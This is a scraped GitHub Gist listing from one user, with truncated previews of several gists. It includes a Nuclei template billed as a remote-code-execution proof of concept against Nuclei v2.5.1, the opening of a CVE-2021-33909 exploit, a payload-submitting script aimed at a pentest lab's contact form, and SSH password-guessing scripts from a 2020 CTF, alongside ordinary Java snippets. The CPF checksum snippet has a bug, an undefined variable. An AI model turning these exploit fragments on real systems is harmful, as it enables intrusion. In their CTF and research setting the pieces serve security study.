c3l3si4n
/ nuclei-rce.yaml
Last active
December 18, 2023 06:48
POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: nuclei-rce | |
| info: | |
| name: Nuclei Template RCE by Chromium | |
| author: c3l3si4n | |
| severity: critical | |
| tags: rce,hackback | |
| headless: | |
| - steps: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer | |
| * Copyright (C) 2021 Qualys, Inc. | |
| * | |
| * This program is free software: you can redistribute it and/or modify | |
| * it under the terms of the GNU General Public License as published by | |
| * the Free Software Foundation, either version 3 of the License, or | |
| * (at your option) any later version. | |
| * | |
| * This program is distributed in the hope that it will be useful, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import string | |
| import base64 | |
| def attempt(payload): | |
| data = {"contactName":"aa","contactEmail":"aa@a.com","website": payload,"contactMessage": "A" * 40} | |
| r = requests.post('https://uhclabs.labdepentest.com.br/inc/sendEmail.php', data=data) | |
| output = r.text | |
| if 'went wrong.' in output: | |
| print("error") |
c3l3si4n
/ two_set_of_credentials.py
Created
August 9, 2020 00:56
Two Set of Credentials exploit script for SpiderLabsCTF2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import paramiko | |
| import sys | |
| import string | |
| import datetime | |
| def test_password(password): | |
| try: | |
| ssh = paramiko.SSHClient() | |
| ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) |
c3l3si4n
/ Remote_IoT_Service_SpiderLabs_2020.py
Last active
August 9, 2020 00:54
Remote IoT Service @ SpiderLabsCTF 2020 writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| First part: Leaking password | |
| """ | |
| import paramiko | |
| from time import sleep | |
| import sys | |
| from pwn import p64 | |
| def test_password(password): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class Cpf { | |
| private static final int[] cpfWeight = {11, 10, 9, 8, 7, 6, 5, 4, 3, 2}; // pesos do cpf, para uso no algoritmo de digito verificador | |
| private static int calculateVerifierDigit(String input, int[] weight) { // funcao de digito verificador, recebe a mensagem a ser verificada e seu peso | |
| int sum = 0; // declaracao da soma | |
| for (int i = input.length() - 1, digit; i >= 0; i--) { | |
| digit = Integer.parseInt(input.substring(i, i + 1)); // itera por cada digito do input | |
| sum += digit * weight[weight.length - input.length() + index]; // 10 - 11 + index | |
| } | |
| sum = 11 - sum % 11; // pega o "módulo 11" da soma | |
| return sum > 9 ? 0 : sum; // se a soma for 10, retornar 0. |
c3l3si4n
/ customerRepository.java
Created
March 9, 2020 01:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @Repository | |
| public interface customerRepository extends JpaRepository<Customer, Long>{ | |
| } |
c3l3si4n
/ productsRepository.java
Created
March 9, 2020 01:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @Repository | |
| public interface productsRepository extends JpaRepository<Products, Long>{ | |
| } |
c3l3si4n
/ products.java
Last active
March 9, 2020 01:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @Entity | |
| public class Products { | |
| @Id | |
| @GeneratedValue(strategy=GenerationType.AUTO) | |
| private Long id; | |
| private String name; | |
| @Unique | |
| private String nickname; | |
| private BigDecimal price; |
c3l3si4n
/ customer.java
Last active
March 9, 2020 01:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @Entity | |
| public class Customer { | |
| @Id | |
| @GeneratedValue(strategy=GenerationType.AUTO) | |
| private Long id; | |
| private String firstName; | |
| private String lastName; | |
| @Unique | |
| private String identityNumber; |